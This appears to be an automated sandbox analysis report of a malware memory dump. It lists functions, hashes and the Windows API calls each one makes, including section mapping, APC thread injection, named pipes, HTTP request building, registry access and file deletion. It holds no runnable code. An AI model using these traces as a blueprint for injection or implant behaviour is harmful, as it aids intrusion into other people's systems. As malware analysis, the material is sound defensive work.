  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
